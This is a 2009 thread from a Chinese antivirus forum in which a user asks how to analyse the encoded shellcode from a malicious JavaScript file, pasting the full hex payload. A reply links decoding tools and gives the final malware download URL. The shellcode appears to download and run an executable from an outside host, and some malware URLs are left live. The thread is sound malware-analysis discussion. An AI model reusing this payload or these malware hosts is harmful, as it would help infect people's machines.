查看: 1893|回复: 2
收起左侧

[可疑文件] http://yasws-05.cn/24/ytlz.js

[复制链接]
virusfans
发表于 2009-4-30 14:51:18 | 显示全部楼层 |阅读模式
請問大家 我看到這個java script 小紅有報
裡面也有shellocde
我把 shellcode 的值印出來 如下
YT56e8YT0000YT5300YT5655YT8b57YT246cYT8b18YT3c45YT548bYT7805YTea01YT4a8bYT8b18YT205aYTeb01YT32e3YT8b49YT8b34YTee01YTff31YT31fcYTacc0YTe038YT0774YTcfc1YT010dYTebc7YT3bf2YT247cYT7514YT8be1YT245aYTeb01YT8b66YT4b0cYT5a8bYT011cYT8bebYT8b04YTe801YT02ebYTc031YT5e5fYT5b5dYT08c2YT5e00YT306aYT6459YT198bYT5b8bYT8b0cYT1c5bYT1b8bYT5b8bYT5308YT8e68YT0e4eYTffecYT89d6YT53c7YT8e68YT0e4eYTffecYTebd6YT5a50YTff52YT89d0YT52c2YT5352YTaa68YT0dfcYTff7cYT5ad6YT4debYT5159YTff52YTebd0YT5a72YT5bebYT6a59YT6a00YT5100YT6a52YTff00YT53d0YTa068YTc9d5YTff4dYT5ad6YTff52YT53d0YT9868YT8afeYTff0eYTebd6YT5944YT006aYTff51YT53d0YT7e68YTe2d8YTff73YT6ad6YTff00YTe8d0YTffabYTffffYT7275YT6d6cYT6e6fYT642eYT6c6cYTe800YTffaeYTffffYT5255YT444cYT776fYT6c6eYT616fYT5464YT466fYT6c69YT4165YTe800YTffa0YTffffYT2e2eYT765cYTe800YTffb7YTffffYT2e2eYT765cYTe800YTff89YTffffYT3432YT322FYT2E34YT7865YT0065YT0000
請問這要用什麼工具和方法可以去分析這裡的shellcode的東西呢

感謝大家的幫助

http://yasws-05.cn/24/ytlz.js
幸福的猪猪
发表于 2009-4-30 15:58:36 | 显示全部楼层

回复 1楼 virusfans 的帖子

你可以参考这个网页上的解密教程(主要看点:1L的解密步骤跟6L高手的提示...)
hxxp://bbs.kafan.cn/thread-470777-1-1.html


用到的工具(hxxp://glacierlk.cn/jm.htm)

用http替换hxxp就可以了!

最终病毒下载地址为:hxxp://yasws-05.cn/24/24.exe

[ 本帖最后由 幸福的猪猪 于 2009-4-30 16:00 编辑 ]
黑衣~魂
发表于 2009-4-30 16:50:33 | 显示全部楼层
TO DW

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-23 23:43 , Processed in 0.081795 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表